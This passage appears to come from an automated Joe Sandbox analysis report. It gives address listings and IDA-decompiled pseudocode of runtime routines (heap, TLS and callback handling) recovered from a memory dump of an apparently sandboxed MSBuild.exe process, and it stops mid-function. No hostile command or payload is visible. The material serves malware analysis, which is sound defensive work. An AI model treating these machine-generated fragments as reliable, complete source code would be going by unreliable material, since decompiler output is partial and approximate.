                                            0x0106b4eb
                                            0x0106b4f0
                                            0x0106b4f2
                                            0x0101dac9
                                            0x0101dacc
                                            0x0101dacf
                                            0x0101dad1
                                            0x0101dd78
                                            0x0101dd78
                                            0x0101dcf2
                                            0x00000000
                                            0x0101dad7
                                            0x0101dad9
                                            0x0101dadb
                                            0x00000000
                                            0x00000000
                                            0x0101dae1
                                            0x0101dae1
                                            0x0101dae4
                                            0x0101dae6
                                            0x0106b4f9
                                            0x0106b4f9
                                            0x0106b500
                                            0x0101daec
                                            0x0101daec
                                            0x0101daf5
                                            0x0101daf8
                                            0x0101dafb
                                            0x0101db03
                                            0x0101db11
                                            0x0101db16
                                            0x0101db19
                                            0x0101db1b
                                            0x0106b52c
                                            0x0106b531
                                            0x0106b534
                                            0x0101db21
                                            0x0101db21
                                            0x0101db24
                                            0x0101dcd9
                                            0x0101dce2
                                            0x0101dce5
                                            0x0101dd6a
                                            0x0101dd6d
                                            0x00000000
                                            0x0101dd73
                                            0x0106b51a
                                            0x0106b51c
                                            0x0106b51f
                                            0x0106b524
                                            0x00000000
                                            0x0106b524
                                            0x0101dce7
                                            0x0101dce7
                                            0x0101dce7
                                            0x00000000
                                            0x0101dce7
                                            0x00000000
                                            0x0101db2a
                                            0x0101db2c
                                            0x0101db31
                                            0x0101db33
                                            0x0101db36
                                            0x0101db39
                                            0x0101db3b
                                            0x0101db66
                                            0x0101db66
                                            0x0101db3d
                                            0x0101db3d
                                            0x0101db3e
                                            0x0101db46
                                            0x0101db47
                                            0x0101db49
                                            0x0101db4c
                                            0x0101db53
                                            0x0101db55
                                            0x0101db58
                                            0x0101db5a
                                            0x0106b50a
                                            0x0106b50f
                                            0x0106b512
                                            0x0101db60
                                            0x0101db60
                                            0x0101db63
                                            0x0101db63
                                            0x00000000
                                            0x0101db63
                                            0x0101db5a
                                            0x0101db3b
                                            0x0101db24
                                            0x0101db69
                                            0x0101db69
                                            0x0101db6c
                                            0x0101db6f
                                            0x0101db74
                                            0x0106b557
                                            0x0106b557
                                            0x0106b55e
                                            0x0101db7a
                                            0x0101db7c
                                            0x0101db7f
                                            0x0101db82
                                            0x0101db85
                                            0x00000000
                                            0x0101db8b
                                            0x0101db8b
                                            0x0101db8d
                                            0x0101db9b
                                            0x0101db9b
                                            0x0101db9d
                                            0x0101dba0
                                            0x0101dba2
                                            0x0101dba4
                                            0x0101dba7
                                            0x0101dba9
                                            0x0101dbae
                                            0x0101dbae
                                            0x0101dbb1
                                            0x0101dbb4
                                            0x0101dbb4
                                            0x0101dbb7
                                            0x0101dbba
                                            0x0101dcd2
                                            0x0101dcd4
                                            0x00000000
                                            0x0101dbc0
                                            0x0101dbc0
                                            0x0101dbd2
                                            0x0101dbd7
                                            0x0101dbda
                                            0x0101dbdd
                                            0x0101dbdf
                                            0x00000000
                                            0x0101dbe5
                                            0x0101dbe5
                                            0x0101dbee
                                            0x0101dbf1
                                            0x0106b541
                                            0x0106b544
                                            0x00000000
                                            0x0106b546
                                            0x0106b546
                                            0x00000000
                                            0x0106b546
                                            0x0101dbf7
                                            0x0101dbf7
                                            0x0101dbfd
                                            0x0101dbfd
                                            0x0101dbff
                                            0x0101dc0b
                                            0x0101dc15
                                            0x0101dc1b
                                            0x0101dc1d
                                            0x0101dc21
                                            0x0101dc21
                                            0x0101dc23
                                            0x0101dc23
                                            0x0101dc26
                                            0x0101dc29
                                            0x0101dc2b
                                            0x00000000
                                            0x00000000
                                            0x0101dc31
                                            0x0101dc34
                                            0x0101dc36
                                            0x0101dcbf
                                            0x0101dcbf
                                            0x0101dcc2
                                            0x00000000
                                            0x0101dc3c
                                            0x0101dc41
                                            0x0101dc43
                                            0x00000000
                                            0x0101dc45
                                            0x0101dc45
                                            0x0101dc47
                                            0x00000000
                                            0x0101dc4d
                                            0x0101dc4d
                                            0x0101dc50
                                            0x0101dc52
                                            0x0101dc55
                                            0x0101dcfa
                                            0x0101dcfe
                                            0x0101dd08
                                            0x0101dd0a
                                            0x0101dd0c
                                            0x00000000
                                            0x0101dd12
                                            0x0101dd15
                                            0x0101dd2d
                                            0x0101dd2f
                                            0x0101dd32
                                            0x0101dd35
                                            0x00000000
                                            0x0101dd35
                                            0x0101dc5b
                                            0x0101dc5b
                                            0x0101dc5e
                                            0x0101dc61
                                            0x0101dc64
                                            0x0101dc67
                                            0x0101dc67
                                            0x0101dc6a
                                            0x0101dc6c
                                            0x0101dc8e
                                            0x0101dc8e
                                            0x0101dc91
                                            0x0101dc93
                                            0x0101dcce
                                            0x0101dcce
                                            0x0101dc95
                                            0x0101dc9c
                                            0x0101dc6e
                                            0x0101dc72
                                            0x0101dc75
                                            0x0101dc77
                                            0x0101dc79
                                            0x0106b551
                                            0x0106b551
                                            0x00000000
                                            0x0101dc7f
                                            0x0101dc7f
                                            0x0101dc81
                                            0x00000000
                                            0x0101dc83
                                            0x0101dc86
                                            0x0101dc88
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0101dc88
                                            0x0101dc81
                                            0x0101dc79
                                            0x0101dc6c
                                            0x0101dc55
                                            0x0101dc47
                                            0x0101dc43
                                            0x00000000
                                            0x0101dc36
                                            0x0101dc23
                                            0x00000000
                                            0x0101dbff
                                            0x0101dbf1
                                            0x0101dbdf
                                            0x0101db8f
                                            0x0101db92
                                            0x0101db95
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0101db95
                                            0x0101db8d
                                            0x0101db85
                                            0x0101db74
                                            0x0101dc9f
                                            0x0101dca2
                                            0x0101dcb0
                                            0x0101dcb0
                                            0x0101dad1
                                            0x0106b4e5
                                            0x0106b4c8
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0101d831
                                            0x00000000
                                            0x0101d800
                                            0x0106b47f
                                            0x0106b485
                                            0x00000000
                                            0x0106b485
                                            0x0101d665
                                            0x0101d652
                                            0x00000000

                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 569955f6cf02d2537555f36efe9dee5489b321115cb02f97205dc9e25c9edff1
                                            • Instruction ID: 25b93ca5f26f54c6cc1bf11d71f5feb36a5771653c3ababac60dbffbc4d8c5b3
                                            • Opcode Fuzzy Hash: 569955f6cf02d2537555f36efe9dee5489b321115cb02f97205dc9e25c9edff1
                                            • Instruction Fuzzy Hash: 29E1D270B0025A8FEB71CF58C888BA9B7F5BF45304F0441D9DAC99B285DB38A981CF51
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 92%
                                            			E0101849B(signed int __ebx, intOrPtr __ecx, signed int __edi, signed int __esi, void* __eflags) {
                                            				void* _t136;
                                            				signed int _t139;
                                            				signed int _t141;
                                            				signed int _t145;
                                            				intOrPtr _t146;
                                            				signed int _t149;
                                            				signed int _t150;
                                            				signed int _t161;
                                            				signed int _t163;
                                            				signed int _t165;
                                            				signed int _t169;
                                            				signed int _t171;
                                            				signed int _t194;
                                            				signed int _t200;
                                            				void* _t201;
                                            				signed int _t204;
                                            				signed int _t206;
                                            				signed int _t210;
                                            				signed int _t214;
                                            				signed int _t215;
                                            				signed int _t218;
                                            				void* _t221;
                                            				signed int _t224;
                                            				signed int _t226;
                                            				intOrPtr _t228;
                                            				signed int _t232;
                                            				signed int _t233;
                                            				signed int _t234;
                                            				void* _t237;
                                            				void* _t238;
                                            
                                            				_t236 = __esi;
                                            				_t235 = __edi;
                                            				_t193 = __ebx;
                                            				_push(0x70);
                                            				_push(0x10df9c0);
                                            				E0105D0E8(__ebx, __edi, __esi);
                                            				 *((intOrPtr*)(_t237 - 0x5c)) = __ecx;
                                            				if( *0x10f7b04 == 0) {
                                            					L4:
                                            					goto L5;
                                            				} else {
                                            					_t136 = E0101CEE4( *((intOrPtr*)(__ecx + 0x18)), 1, 9, _t237 - 0x58, _t237 - 0x54);
                                            					_t236 = 0;
                                            					if(_t136 < 0) {
                                            						 *((intOrPtr*)(_t237 - 0x54)) = 0;
                                            					}
                                            					if( *((intOrPtr*)(_t237 - 0x54)) != 0) {
                                            						_t193 =  *( *[fs:0x30] + 0x18);
                                            						 *(_t237 - 0x48) =  *( *[fs:0x30] + 0x18);
                                            						 *(_t237 - 0x68) = _t236;
                                            						 *(_t237 - 0x6c) = _t236;
                                            						_t235 = _t236;
                                            						 *(_t237 - 0x60) = _t236;
                                            						E01022280( *[fs:0x30], 0x10f8550);
                                            						_t139 =  *0x10f7b04; // 0x1
                                            						__eflags = _t139 - 1;
                                            						if(__eflags != 0) {
                                            							_t200 = 0xc;
                                            							_t201 = _t237 - 0x40;
                                            							_t141 = E0103F3D5(_t201, _t139 * _t200, _t139 * _t200 >> 0x20);
                                            							 *(_t237 - 0x44) = _t141;
                                            							__eflags = _t141;
                                            							if(_t141 < 0) {
                                            								L50:
                                            								E0101FFB0(_t193, _t235, 0x10f8550);
                                            								L5:
                                            								return E0105D130(_t193, _t235, _t236);
                                            							}
                                            							_push(_t201);
                                            							_t221 = 0x10;
                                            							_t202 =  *(_t237 - 0x40);
                                            							_t145 = E01001C45( *(_t237 - 0x40), _t221);
                                            							 *(_t237 - 0x44) = _t145;
                                            							__eflags = _t145;
                                            							if(_t145 < 0) {
                                            								goto L50;
                                            							}
                                            							_t146 =  *0x10f7b9c; // 0x0
                                            							_t235 = L01024620(_t202, _t193, _t146 + 0xc0000,  *(_t237 - 0x40));
                                            							 *(_t237 - 0x60) = _t235;
                                            							__eflags = _t235;
                                            							if(_t235 == 0) {
                                            								_t149 = 0xc0000017;
                                            								 *(_t237 - 0x44) = 0xc0000017;
                                            							} else {
                                            								_t149 =  *(_t237 - 0x44);
                                            							}
                                            							__eflags = _t149;
                                            							if(__eflags >= 0) {
                                            								L8:
                                            								 *(_t237 - 0x64) = _t235;
                                            								_t150 =  *0x10f7b10; // 0x0
                                            								 *(_t237 - 0x4c) = _t150;
                                            								_push(_t237 - 0x74);
                                            								_push(_t237 - 0x39);
                                            								_push(_t237 - 0x58);
                                            								_t193 = E0103A61C(_t193,  *((intOrPtr*)(_t237 - 0x54)),  *((intOrPtr*)(_t237 - 0x5c)), _t235, _t236, __eflags);
                                            								 *(_t237 - 0x44) = _t193;
                                            								__eflags = _t193;
                                            								if(_t193 < 0) {
                                            									L30:
                                            									E0101FFB0(_t193, _t235, 0x10f8550);
                                            									__eflags = _t235 - _t237 - 0x38;
                                            									if(_t235 != _t237 - 0x38) {
                                            										_t235 =  *(_t237 - 0x48);
                                            										L010277F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x48));
                                            									} else {
                                            										_t235 =  *(_t237 - 0x48);
                                            									}
                                            									__eflags =  *(_t237 - 0x6c);
                                            									if( *(_t237 - 0x6c) != 0) {
                                            										L010277F0(_t235, _t236,  *(_t237 - 0x6c));
                                            									}
                                            									__eflags = _t193;
                                            									if(_t193 >= 0) {
                                            										goto L4;
                                            									} else {
                                            										goto L5;
                                            									}
                                            								}
                                            								_t204 =  *0x10f7b04; // 0x1
                                            								 *(_t235 + 8) = _t204;
                                            								__eflags =  *((char*)(_t237 - 0x39));
                                            								if( *((char*)(_t237 - 0x39)) != 0) {
                                            									 *(_t235 + 4) = 1;
                                            									 *(_t235 + 0xc) =  *(_t237 - 0x4c);
                                            									_t161 =  *0x10f7b10; // 0x0
                                            									 *(_t237 - 0x4c) = _t161;
                                            								} else {
                                            									 *(_t235 + 4) = _t236;
                                            									 *(_t235 + 0xc) =  *(_t237 - 0x58);
                                            								}
                                            								 *((intOrPtr*)(_t237 - 0x54)) = E010437C5( *((intOrPtr*)(_t237 - 0x74)), _t237 - 0x70);
                                            								_t224 = _t236;
                                            								 *(_t237 - 0x40) = _t236;
                                            								 *(_t237 - 0x50) = _t236;
                                            								while(1) {
                                            									_t163 =  *(_t235 + 8);
                                            									__eflags = _t224 - _t163;
                                            									if(_t224 >= _t163) {
                                            										break;
                                            									}
                                            									_t228 =  *0x10f7b9c; // 0x0
                                            									_t214 = L01024620( *((intOrPtr*)(_t237 - 0x54)) + 1,  *(_t237 - 0x48), _t228 + 0xc0000,  *(_t237 - 0x70) +  *((intOrPtr*)(_t237 - 0x54)) + 1);
                                            									 *(_t237 - 0x78) = _t214;
                                            									__eflags = _t214;
                                            									if(_t214 == 0) {
                                            										L52:
                                            										_t193 = 0xc0000017;
                                            										L19:
                                            										 *(_t237 - 0x44) = _t193;
                                            										L20:
                                            										_t206 =  *(_t237 - 0x40);
                                            										__eflags = _t206;
                                            										if(_t206 == 0) {
                                            											L26:
                                            											__eflags = _t193;
                                            											if(_t193 < 0) {
                                            												E010437F5( *((intOrPtr*)(_t237 - 0x5c)), _t237 - 0x6c);
                                            												__eflags =  *((char*)(_t237 - 0x39));
                                            												if( *((char*)(_t237 - 0x39)) != 0) {
                                            													 *0x10f7b10 =  *0x10f7b10 - 8;
                                            												}
                                            											} else {
                                            												_t169 =  *(_t237 - 0x68);
                                            												__eflags = _t169;
                                            												if(_t169 != 0) {
                                            													 *0x10f7b04 =  *0x10f7b04 - _t169;
                                            												}
                                            											}
                                            											__eflags = _t193;
                                            											if(_t193 >= 0) {
                                            												 *((short*)( *((intOrPtr*)(_t237 - 0x5c)) + 0x3a)) = 0xffff;
                                            											}
                                            											goto L30;
                                            										}
                                            										_t226 = _t206 * 0xc;
                                            										__eflags = _t226;
                                            										_t194 =  *(_t237 - 0x48);
                                            										do {
                                            											 *(_t237 - 0x40) = _t206 - 1;
                                            											_t226 = _t226 - 0xc;
                                            											 *(_t237 - 0x4c) = _t226;
                                            											__eflags =  *(_t235 + _t226 + 0x10) & 0x00000002;
                                            											if(( *(_t235 + _t226 + 0x10) & 0x00000002) == 0) {
                                            												__eflags =  *(_t235 + _t226 + 0x10) & 0x00000001;
                                            												if(( *(_t235 + _t226 + 0x10) & 0x00000001) == 0) {
                                            													 *(_t237 - 0x68) =  *(_t237 - 0x68) + 1;
                                            													_t210 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
                                            													__eflags =  *((char*)(_t237 - 0x39));
                                            													if( *((char*)(_t237 - 0x39)) == 0) {
                                            														_t171 = _t210;
                                            													} else {
                                            														 *(_t237 - 0x50) =  *(_t210 +  *(_t237 - 0x58) * 4);
                                            														L010277F0(_t194, _t236, _t210 - 8);
                                            														_t171 =  *(_t237 - 0x50);
                                            													}
                                            													L48:
                                            													L010277F0(_t194, _t236,  *((intOrPtr*)(_t171 - 4)));
                                            													L46:
                                            													_t206 =  *(_t237 - 0x40);
                                            													_t226 =  *(_t237 - 0x4c);
                                            													goto L24;
                                            												}
                                            												 *0x10f7b08 =  *0x10f7b08 + 1;
                                            												goto L24;
                                            											}
                                            											_t171 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
                                            											__eflags = _t171;
                                            											if(_t171 != 0) {
                                            												__eflags =  *((char*)(_t237 - 0x39));
                                            												if( *((char*)(_t237 - 0x39)) == 0) {
                                            													goto L48;
                                            												}
                                            												E010457C2(_t171,  *((intOrPtr*)(_t235 + _t226 + 0x18)));
                                            												goto L46;
                                            											}
                                            											L24:
                                            											__eflags = _t206;
                                            										} while (_t206 != 0);
                                            										_t193 =  *(_t237 - 0x44);
                                            										goto L26;
                                            									}
                                            									_t232 =  *(_t237 - 0x70) + 0x00000001 + _t214 &  !( *(_t237 - 0x70));
                                            									 *(_t237 - 0x7c) = _t232;
                                            									 *(_t232 - 4) = _t214;
                                            									 *(_t237 - 4) = _t236;
                                            									E0104F3E0(_t232,  *((intOrPtr*)( *((intOrPtr*)(_t237 - 0x74)) + 8)),  *((intOrPtr*)(_t237 - 0x54)));
                                            									_t238 = _t238 + 0xc;
                                            									 *(_t237 - 4) = 0xfffffffe;
                                            									_t215 =  *(_t237 - 0x48);
                                            									__eflags = _t193;
                                            									if(_t193 < 0) {
                                            										L010277F0(_t215, _t236,  *(_t237 - 0x78));
                                            										goto L20;
                                            									}
                                            									__eflags =  *((char*)(_t237 - 0x39));
                                            									if( *((char*)(_t237 - 0x39)) != 0) {
                                            										_t233 = E0103A44B( *(_t237 - 0x4c));
                                            										 *(_t237 - 0x50) = _t233;
                                            										__eflags = _t233;
                                            										if(_t233 == 0) {
                                            											L010277F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x78));
                                            											goto L52;
                                            										}
                                            										 *(_t233 +  *(_t237 - 0x58) * 4) =  *(_t237 - 0x7c);
                                            										L17:
                                            										_t234 =  *(_t237 - 0x40);
                                            										_t218 = _t234 * 0xc;
                                            										 *(_t218 +  *(_t237 - 0x64) + 0x14) =  *(_t237 - 0x50);
                                            										 *(_t218 + _t235 + 0x10) = _t236;
                                            										_t224 = _t234 + 1;
                                            										 *(_t237 - 0x40) = _t224;
                                            										 *(_t237 - 0x50) = _t224;
                                            										_t193 =  *(_t237 - 0x44);
                                            										continue;
                                            									}
                                            									 *(_t237 - 0x50) =  *(_t237 - 0x7c);
                                            									goto L17;
                                            								}
                                            								 *_t235 = _t236;
                                            								_t165 = 0x10 + _t163 * 0xc;
                                            								__eflags = _t165;
                                            								_push(_t165);
                                            								_push(_t235);
                                            								_push(0x23);
                                            								_push(0xffffffff);
                                            								_t193 = E010496C0();
                                            								goto L19;
                                            							} else {
                                            								goto L50;
                                            							}
                                            						}
                                            						_t235 = _t237 - 0x38;
                                            						 *(_t237 - 0x60) = _t235;
                                            						goto L8;
                                            					}
                                            					goto L4;
                                            				}
                                            			}

































                                            0x0101849b
                                            0x0101849b
                                            0x0101849b
                                            0x0101849b
                                            0x0101849d
                                            0x010184a2
                                            0x010184a7
                                            0x010184b1
                                            0x010184d8
                                            0x00000000
                                            0x010184b3
                                            0x010184c4
                                            0x010184c9
                                            0x010184cd
                                            0x010184cf
                                            0x010184cf
                                            0x010184d6
                                            0x010184e6
                                            0x010184e9
                                            0x010184ec
                                            0x010184ef
                                            0x010184f2
                                            0x010184f4
                                            0x010184fc
                                            0x01018501
                                            0x01018506
                                            0x01018509
                                            0x010186e0
                                            0x010186e5
                                            0x010186e8
                                            0x010186ed
                                            0x010186f0
                                            0x010186f2
                                            0x01069afd
                                            0x01069b02
                                            0x010184da
                                            0x010184df
                                            0x010184df
                                            0x010186fa
                                            0x010186fd
                                            0x010186fe
                                            0x01018701
                                            0x01018706
                                            0x01018709
                                            0x0101870b
                                            0x00000000
                                            0x00000000
                                            0x01018711
                                            0x01018725
                                            0x01018727
                                            0x0101872a
                                            0x0101872c
                                            0x01069af0
                                            0x01069af5
                                            0x01018732
                                            0x01018732
                                            0x01018732
                                            0x01018735
                                            0x01018737
                                            0x01018515
                                            0x01018515
                                            0x01018518
                                            0x0101851d
                                            0x01018523
                                            0x01018527
                                            0x0101852b
                                            0x01018537
                                            0x01018539
                                            0x0101853c
                                            0x0101853e
                                            0x0101868c
                                            0x01018691
                                            0x01018699
                                            0x0101869b
                                            0x01018744
                                            0x01018748
                                            0x010186a1
                                            0x010186a1
                                            0x010186a1
                                            0x010186a4
                                            0x010186a8
                                            0x01069bdf
                                            0x01069bdf
                                            0x010186ae
                                            0x010186b0
                                            0x00000000
                                            0x010186b6
                                            0x00000000
                                            0x01069be9
                                            0x010186b0
                                            0x01018544
                                            0x0101854a
                                            0x0101854d
                                            0x01018551
                                            0x0101876e
                                            0x01018778
                                            0x0101877b
                                            0x01018780
                                            0x01018557
                                            0x01018557
                                            0x0101855d
                                            0x0101855d
                                            0x0101856b
                                            0x0101856e
                                            0x01018570
                                            0x01018573
                                            0x01018576
                                            0x01018576
                                            0x01018579
                                            0x0101857b
                                            0x00000000
                                            0x00000000
                                            0x01018581
                                            0x010185a0
                                            0x010185a2
                                            0x010185a5
                                            0x010185a7
                                            0x01069b1b
                                            0x01069b1b
                                            0x0101862e
                                            0x0101862e
                                            0x01018631
                                            0x01018631
                                            0x01018634
                                            0x01018636
                                            0x01018669
                                            0x01018669
                                            0x0101866b
                                            0x01069bbf
                                            0x01069bc4
                                            0x01069bc8
                                            0x01069bce
                                            0x01069bce
                                            0x01018671
                                            0x01018671
                                            0x01018674
                                            0x01018676
                                            0x01069bae
                                            0x01069bae
                                            0x01018676
                                            0x0101867c
                                            0x0101867e
                                            0x01018688
                                            0x01018688
                                            0x00000000
                                            0x0101867e
                                            0x01018638
                                            0x01018638
                                            0x0101863b
                                            0x0101863e
                                            0x0101863f
                                            0x01018642
                                            0x01018645
                                            0x01018648
                                            0x0101864d
                                            0x01069b69
                                            0x01069b6e
                                            0x01069b7b
                                            0x01069b81
                                            0x01069b85
                                            0x01069b89
                                            0x01069ba7
                                            0x01069b8b
                                            0x01069b91
                                            0x01069b9a
                                            0x01069b9f
                                            0x01069b9f
                                            0x01018788
                                            0x0101878d
                                            0x01018763
                                            0x01018763
                                            0x01018766
                                            0x00000000
                                            0x01018766
                                            0x01069b70
                                            0x00000000
                                            0x01069b70
                                            0x01018656
                                            0x0101865a
                                            0x0101865c
                                            0x01018752
                                            0x01018756
                                            0x00000000
                                            0x00000000
                                            0x0101875e
                                            0x00000000
                                            0x0101875e
                                            0x01018662
                                            0x01018662
                                            0x01018662
                                            0x01018666
                                            0x00000000
                                            0x01018666
                                            0x010185b7
                                            0x010185b9
                                            0x010185bc
                                            0x010185bf
                                            0x010185cc
                                            0x010185d1
                                            0x010185d4
                                            0x010185db
                                            0x010185de
                                            0x010185e0
                                            0x01069b5f
                                            0x00000000
                                            0x01069b5f
                                            0x010185e6
                                            0x010185ea
                                            0x010186c3
                                            0x010186c5
                                            0x010186c8
                                            0x010186ca
                                            0x01069b16
                                            0x00000000
                                            0x01069b16
                                            0x010186d6
                                            0x010185f6
                                            0x010185f6
                                            0x010185f9
                                            0x01018602
                                            0x01018606
                                            0x0101860a
                                            0x0101860b
                                            0x0101860e
                                            0x01018611
                                            0x00000000
                                            0x01018611
                                            0x010185f3
                                            0x00000000
                                            0x010185f3
                                            0x01018619
                                            0x0101861e
                                            0x0101861e
                                            0x01018621
                                            0x01018622
                                            0x01018623
                                            0x01018625
                                            0x0101862c
                                            0x00000000
                                            0x0101873d
                                            0x00000000
                                            0x0101873d
                                            0x01018737
                                            0x0101850f
                                            0x01018512
                                            0x00000000
                                            0x01018512
                                            0x00000000
                                            0x010184d6

                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 3076d0754171b23bf77fba746cde91c8bea7c205b0657dbbc1da2a640c40babd
                                            • Instruction ID: 2c2a4a6f040ac6144cce290513913b01606ae2ecdab95ed5d2c62846d0197b34
                                            • Opcode Fuzzy Hash: 3076d0754171b23bf77fba746cde91c8bea7c205b0657dbbc1da2a640c40babd
                                            • Instruction Fuzzy Hash: 68B17C70E00209DFDB25CFE8C984AEDBBB9FF59304F10812EE585AB649DB74A945CB50
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 67%
                                            			E0103513A(intOrPtr __ecx, void* __edx) {
                                            				signed int _v8;
                                            				signed char _v16;
                                            				intOrPtr _v20;
                                            				intOrPtr _v24;
                                            				char _v28;
                                            				signed int _v32;
                                            				signed int _v36;
                                            				signed int _v40;
                                            				intOrPtr _v44;
                                            				intOrPtr _v48;
                                            				char _v63;
                                            				char _v64;
                                            				signed int _v72;
                                            				signed int _v76;
                                            				signed int _v80;
                                            				signed int _v84;
                                            				signed int _v88;
                                            				signed char* _v92;
                                            				signed int _v100;
                                            				signed int _v104;
                                            				char _v105;
                                            				void* __ebx;
                                            				void* __edi;
                                            				void* __esi;
                                            				void* _t157;
                                            				signed int _t159;
                                            				signed int _t160;
                                            				unsigned int* _t161;
                                            				intOrPtr _t165;
                                            				signed int _t172;
                                            				signed char* _t181;
                                            				intOrPtr _t189;
                                            				intOrPtr* _t200;
                                            				signed int _t202;
                                            				signed int _t203;
                                            				char _t204;
                                            				signed int _t207;
                                            				signed int _t208;
                                            				void* _t209;
                                            				intOrPtr _t210;
                                            				signed int _t212;
                                            				signed int _t214;
                                            				signed int _t221;
                                            				signed int _t222;
                                            				signed int _t226;
                                            				intOrPtr* _t232;
                                            				signed int _t233;
                                            				signed int _t234;
                                            				intOrPtr _t237;
                                            				intOrPtr _t238;
                                            				intOrPtr _t240;
                                            				void* _t245;
                                            				signed int _t246;
                                            				signed int _t247;
                                            				void* _t248;
                                            				void* _t251;
                                            				void* _t252;
                                            				signed int _t253;
                                            				signed int _t255;
                                            				signed int _t256;
                                            
                                            				_t255 = (_t253 & 0xfffffff8) - 0x6c;
                                            				_v8 =  *0x10fd360 ^ _t255;
                                            				_v32 = _v32 & 0x00000000;
                                            				_t251 = __edx;
                                            				_t237 = __ecx;
                                            				_t212 = 6;
                                            				_t245 =  &_v84;
                                            				_t207 =  *((intOrPtr*)(__ecx + 0x48));
                                            				_v44 =  *((intOrPtr*)(__edx + 0xc8));
                                            				_v48 = __ecx;
                                            				_v36 = _t207;
                                            				_t157 = memset(_t245, 0, _t212 << 2);
                                            				_t256 = _t255 + 0xc;
                                            				_t246 = _t245 + _t212;
                                            				if(_t207 == 2) {
                                            					_t247 =  *(_t237 + 0x60);
                                            					_t208 =  *(_t237 + 0x64);
                                            					_v63 =  *((intOrPtr*)(_t237 + 0x4c));
                                            					_t159 =  *((intOrPtr*)(_t237 + 0x58));
                                            					_v104 = _t159;
                                            					_v76 = _t159;
                                            					_t160 =  *((intOrPtr*)(_t237 + 0x5c));
                                            					_v100 = _t160;
                                            					_v72 = _t160;
                                            					L19:
                                            					_v80 = _t208;
                                            					_v84 = _t247;
                                            					L8:
                                            					_t214 = 0;
                                            					if( *(_t237 + 0x74) > 0) {
                                            						_t82 = _t237 + 0x84; // 0x124
                                            						_t161 = _t82;
                                            						_v92 = _t161;
                                            						while( *_t161 >> 0x1f != 0) {
                                            							_t200 = _v92;
                                            							if( *_t200 == 0x80000000) {
                                            								break;
                                            							}
                                            							_t214 = _t214 + 1;
                                            							_t161 = _t200 + 0x10;
                                            							_v92 = _t161;
                                            							if(_t214 <  *(_t237 + 0x74)) {
                                            								continue;
                                            							}
                                            							goto L9;
                                            						}
                                            						_v88 = _t214 << 4;
                                            						_v40 = _t237 +  *((intOrPtr*)(_v88 + _t237 + 0x78));
                                            						_t165 = 0;
                                            						asm("adc eax, [ecx+edx+0x7c]");
                                            						_v24 = _t165;
                                            						_v28 = _v40;
                                            						_v20 =  *((intOrPtr*)(_v88 + _t237 + 0x80));
                                            						_t221 = _v40;
                                            						_v16 =  *_v92;
                                            						_v32 =  &_v28;
                                            						if( *(_t237 + 0x4e) >> 0xf == 0) {
                                            							goto L9;
                                            						}
                                            						_t240 = _v48;
                                            						if( *_v92 != 0x80000000) {
                                            							goto L9;
                                            						}
                                            						 *((intOrPtr*)(_t221 + 8)) = 0;
                                            						 *((intOrPtr*)(_t221 + 0xc)) = 0;
                                            						 *((intOrPtr*)(_t221 + 0x14)) = 0;
                                            						 *((intOrPtr*)(_t221 + 0x10)) = _v20;
                                            						_t226 = 0;
                                            						_t181 = _t251 + 0x66;
                                            						_v88 = 0;
                                            						_v92 = _t181;
                                            						do {
                                            							if( *((char*)(_t181 - 2)) == 0) {
                                            								goto L31;
                                            							}
                                            							_t226 = _v88;
                                            							if(( *_t181 & 0x000000ff) == ( *(_t240 + 0x4e) & 0x7fff)) {
                                            								_t181 = E0104D0F0(1, _t226 + 0x20, 0);
                                            								_t226 = _v40;
                                            								 *(_t226 + 8) = _t181;
                                            								 *((intOrPtr*)(_t226 + 0xc)) = 0;
                                            								L34:
                                            								if(_v44 == 0) {
                                            									goto L9;
                                            								}
                                            								_t210 = _v44;
                                            								_t127 = _t210 + 0x1c; // 0x1c
                                            								_t249 = _t127;
                                            								E01022280(_t181, _t127);
                                            								 *(_t210 + 0x20) =  *( *[fs:0x18] + 0x24);
                                            								_t185 =  *((intOrPtr*)(_t210 + 0x94));
                                            								if( *((intOrPtr*)(_t210 + 0x94)) != 0) {
                                            									L010277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t185);
                                            								}
                                            								_t189 = L01024620(_t226,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v20 + 0x10);
                                            								 *((intOrPtr*)(_t210 + 0x94)) = _t189;
                                            								if(_t189 != 0) {
                                            									 *((intOrPtr*)(_t189 + 8)) = _v20;
                                            									 *( *((intOrPtr*)(_t210 + 0x94)) + 0xc) = _v16;
                                            									_t232 =  *((intOrPtr*)(_t210 + 0x94));
                                            									 *_t232 = _t232 + 0x10;
                                            									 *(_t232 + 4) =  *(_t232 + 4) & 0x00000000;
                                            									E0104F3E0( *((intOrPtr*)( *((intOrPtr*)(_t210 + 0x94)))), _v28, _v20);
                                            									_t256 = _t256 + 0xc;
                                            								}
                                            								 *(_t210 + 0x20) =  *(_t210 + 0x20) & 0x00000000;
                                            								E0101FFB0(_t210, _t249, _t249);
                                            								_t222 = _v76;
                                            								_t172 = _v80;
                                            								_t208 = _v84;
                                            								_t247 = _v88;
                                            								L10:
                                            								_t238 =  *((intOrPtr*)(_t251 + 0x1c));
                                            								_v44 = _t238;
                                            								if(_t238 != 0) {
                                            									 *0x10fb1e0(_v48 + 0x38, _v36, _v63, _t172, _t222, _t247, _t208, _v32,  *((intOrPtr*)(_t251 + 0x20)));
                                            									_v44();
                                            								}
                                            								_pop(_t248);
                                            								_pop(_t252);
                                            								_pop(_t209);
